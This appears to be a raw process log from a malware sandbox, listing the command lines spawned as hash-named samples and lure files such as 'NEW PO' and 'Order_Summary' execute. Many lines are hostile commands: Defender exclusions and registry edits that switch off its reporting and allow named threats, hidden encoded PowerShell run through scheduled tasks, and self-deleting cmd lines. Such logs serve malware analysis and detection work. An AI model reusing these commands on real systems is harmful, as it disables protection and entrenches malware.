C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-12\" -spe -an -ai#7zMap21533:88:7zEvent29835

C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe

"C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe"

C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe

"C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe"

C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe

"C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe"

C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe

"C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe"

C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe

"C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe"

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\" -spe -an -ai#7zMap27574:218:7zEvent32257

C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe

"C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe"

C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe

"C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe"

C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe

"C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\PkQqCfDORU.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PkQqCfDORU" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA125.tmp"

C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe

"C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4392 -ip 4392

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 2232

C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe

"C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe"

C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe

"C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\87zsgA5Of2.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe

"C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe"

C:\Program Files (x86)\Windows Multimedia Platform\smss.exe

"C:\Program Files (x86)\Windows Multimedia Platform\smss.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\PkQqCfDORU.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PkQqCfDORU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp461F.tmp"

C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe

"C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe"

C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe

"C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-07\" -spe -an -ai#7zMap15053:88:7zEvent11657

C:\Users\Admin\Downloads\2023-11-23-07\7fcf515fc374fde7a68255e8bee877a91963cbd54e86eaa222a0efb550cebb6b.exe

"C:\Users\Admin\Downloads\2023-11-23-07\7fcf515fc374fde7a68255e8bee877a91963cbd54e86eaa222a0efb550cebb6b.exe"

C:\Users\Admin\AppData\Local\Temp\ghstve.exe

"C:\Users\Admin\AppData\Local\Temp\ghstve.exe"

C:\Users\Admin\AppData\Local\Temp\ghstve.exe

"C:\Users\Admin\AppData\Local\Temp\ghstve.exe"

C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe

"C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe"

C:\Users\Admin\Downloads\2023-11-23-07\87dc39ac4be051faa3b71b9898b3cd39eaf8c78f5d59610ade25f63c306887ad.exe

"C:\Users\Admin\Downloads\2023-11-23-07\87dc39ac4be051faa3b71b9898b3cd39eaf8c78f5d59610ade25f63c306887ad.exe"

C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe

"C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe"

C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe

"C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe"

C:\Users\Admin\Downloads\2023-11-23-07\9967dbf940ce71c3aff8f0b62c7ef9324dd30e6ae4bbb2db4b16c0a184e383f7.exe

"C:\Users\Admin\Downloads\2023-11-23-07\9967dbf940ce71c3aff8f0b62c7ef9324dd30e6ae4bbb2db4b16c0a184e383f7.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe

"C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe"

C:\Users\Admin\Downloads\2023-11-23-07\a7a33a377911477afe031d59a486e5ed432da1bd9fabfb9450a5951c7b2edd07.exe

"C:\Users\Admin\Downloads\2023-11-23-07\a7a33a377911477afe031d59a486e5ed432da1bd9fabfb9450a5951c7b2edd07.exe"

C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe

"C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe"

C:\Users\Admin\Downloads\2023-11-23-07\8ba6d00a29c4a11c7fcbf696066abb1e891aef6ab8bbc1f7ddd128da24a9a8f6.exe

"C:\Users\Admin\Downloads\2023-11-23-07\8ba6d00a29c4a11c7fcbf696066abb1e891aef6ab8bbc1f7ddd128da24a9a8f6.exe"

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-07\8d9050074a495def6132461608249dad47f5b014c35abc0c6773742d0211b251\" -spe -an -ai#7zMap30902:218:7zEvent11110

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-07\70bcc3b1407f7dd2c403231a4f2c1e374b715248be005684b6d1e36c0b3a6ffe\" -spe -an -ai#7zMap6707:218:7zEvent18498

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\" -spe -an -ai#7zMap24720:218:7zEvent29395

C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe

"C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe"

C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\Order_Summary.exe

"C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\Order_Summary.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\2023-11-23-07\714971d8fde4253f72440e5880af794ae86ca0b2557df3b9de2aca24990c1c9c.xlsx"

C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe

"C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe"

C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe

"C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe"

C:\Users\Admin\AppData\Roaming\smssc\smssc.exe

"C:\Users\Admin\AppData\Roaming\smssc\smssc.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2240 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-22-22\" -spe -an -ai#7zMap17809:88:7zEvent26173

C:\Users\Admin\Downloads\2023-11-22-22\1324fa6536148b20c0452f0d0d3930c77ca32d2abef6bae3f2019931d4a9517c.exe

"C:\Users\Admin\Downloads\2023-11-22-22\1324fa6536148b20c0452f0d0d3930c77ca32d2abef6bae3f2019931d4a9517c.exe"

C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe

"C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe"

C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe

"C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe"

C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe

"C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe"

C:\Users\Admin\Downloads\2023-11-22-22\ef74c4c21db18cfae6ef7ec3761c074d433f81945835613f0772c87c077cb137.exe

"C:\Users\Admin\Downloads\2023-11-22-22\ef74c4c21db18cfae6ef7ec3761c074d433f81945835613f0772c87c077cb137.exe"

C:\Users\Admin\Downloads\2023-11-22-22\facc892bab57ba7b10fa2c6170577f45137ab714b4a0622187344e86dde0dac9.exe

"C:\Users\Admin\Downloads\2023-11-22-22\facc892bab57ba7b10fa2c6170577f45137ab714b4a0622187344e86dde0dac9.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5216 -ip 5216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5512 -ip 5512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 348

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 636 -ip 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 2252

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-10\" -spe -an -ai#7zMap12309:88:7zEvent5162

C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe

"C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe"

C:\Users\Admin\Downloads\2023-11-23-10\bf20e10da6c6c4a65f9e992ea5dc4618d09dda0b3fe9de72fbe6e62dc791b307.exe

"C:\Users\Admin\Downloads\2023-11-23-10\bf20e10da6c6c4a65f9e992ea5dc4618d09dda0b3fe9de72fbe6e62dc791b307.exe"

C:\Users\Admin\AppData\Local\Temp\7zS5A07.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe

.\Install.exe /taAdidMRmzJ "525403" /S

C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe

"C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gJOEVIibN" /SC once /ST 09:16:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gJOEVIibN"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==

C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe

"C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gJOEVIibN"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bPIVdqgtNzoofgavuM" /SC once /ST 15:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe\" r3 /pRsite_idUnG 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe

C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe r3 /pRsite_idUnG 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

